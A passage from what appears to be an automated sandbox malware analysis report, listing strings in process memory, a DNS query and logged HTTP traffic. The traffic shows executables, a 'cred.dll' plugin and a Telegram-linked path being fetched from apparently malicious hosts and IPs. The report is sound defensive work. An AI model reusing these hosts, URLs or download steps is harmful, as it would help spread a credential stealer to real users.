                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: F65C.exe, 00000012.00000002.825741767.0000000003F01000.00000004.00000001.sdmp, F65C.exe, 00000023.00000000.820336133.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: https://consent.google.com/?hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?
                          Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
                          Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                          Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Roboto:400
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmpString found in binary or memory: https://support.google.com/chrome/answer/6258784
                          Source: 5C89.exe, 00000026.00000002.987388003.0000000002FDE000.00000004.00000020.sdmpString found in binary or memory: https://t.me/capibar
                          Source: 5C89.exe, 00000026.00000002.1045877274.0000000005215000.00000004.00000001.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
                          Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                          Source: svchost.exe, 0000001C.00000003.801590976.000001C02177D000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801757401.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801683194.000001C0217BE000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.801724830.000001C02179E000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                          Source: 5C89.exe, 00000026.00000002.1043200803.0000000005200000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/gws_rd=ssl
                          Source: F65C.exe, 00000023.00000003.928189682.0000000003A98000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.927383857.0000000003A27000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.928819384.0000000003B0A000.00000004.00000001.sdmp, F65C.exe, 00000023.00000003.929405321.0000000003B7B000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                          Source: 5C89.exe, 00000026.00000002.1049327482.0000000005239000.00000004.00000001.sdmpString found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
                          Source: svchost.exe, 0000001C.00000003.802948696.000001C02178F000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802872605.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.803050058.000001C021C02000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802727525.000001C0217A6000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000003.802640576.000001C021759000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                          Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                          Source: C:\Users\user\AppData\Local\Temp\DB31.exeCode function: 16_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /files/8474_1641976243_3082.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET /d2VxjasuwS/plugins/cred.dll HTTP/1.1Host: 185.215.113.35
                          Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: GET /capibar HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: 185.163.204.22
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/71fe7726da53cb25be1ef5cfcccec20e728d94fe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: global trafficHTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: a0621298.xsph.ru
                          Source: global trafficHTTP traffic detected: GET //l/f/S2zKVH4BZ2GIX1a3NFPE/724da1c439bafff55600e6bd8e8cc799e96c0335 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 185.163.204.24
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:24:58 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 0d 0a 14 00 00 00 7b fa f6 1a b5 69 2b 2c 47 fa 0e a8 c1 82 9f 4f 1a c4 da 16 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 19{i+,GO0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:24:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:00 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 32 64 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f 90 df 13 49 3a 4a a6 e8 dd e6 f8 5f f5 4a 88 2d a0 57 53 98 00 e5 a7 2c f8 2f 0d 0a 30 0d 0a 0d 0a Data Ascii: 2dI:82OI:J_J-WS,/0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:01 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 34 36 0d 0a 00 00 d3 92 a0 49 bd 3a 38 32 11 af 01 b5 db ad d6 09 4f c5 86 52 06 26 1a ff b5 98 ff a9 1e ad 12 93 3a f9 55 50 99 4a f7 e0 25 e5 39 1a 47 ec aa 8c 70 bc 57 dd 43 de ff 21 81 22 e6 c3 95 50 28 e1 a8 1d 63 a9 0d 0a 30 0d 0a 0d 0a Data Ascii: 46I:82OR&:UPJ%9GpWC!"P(c0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:04 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 14 Jan 2022 08:25:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeData Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0
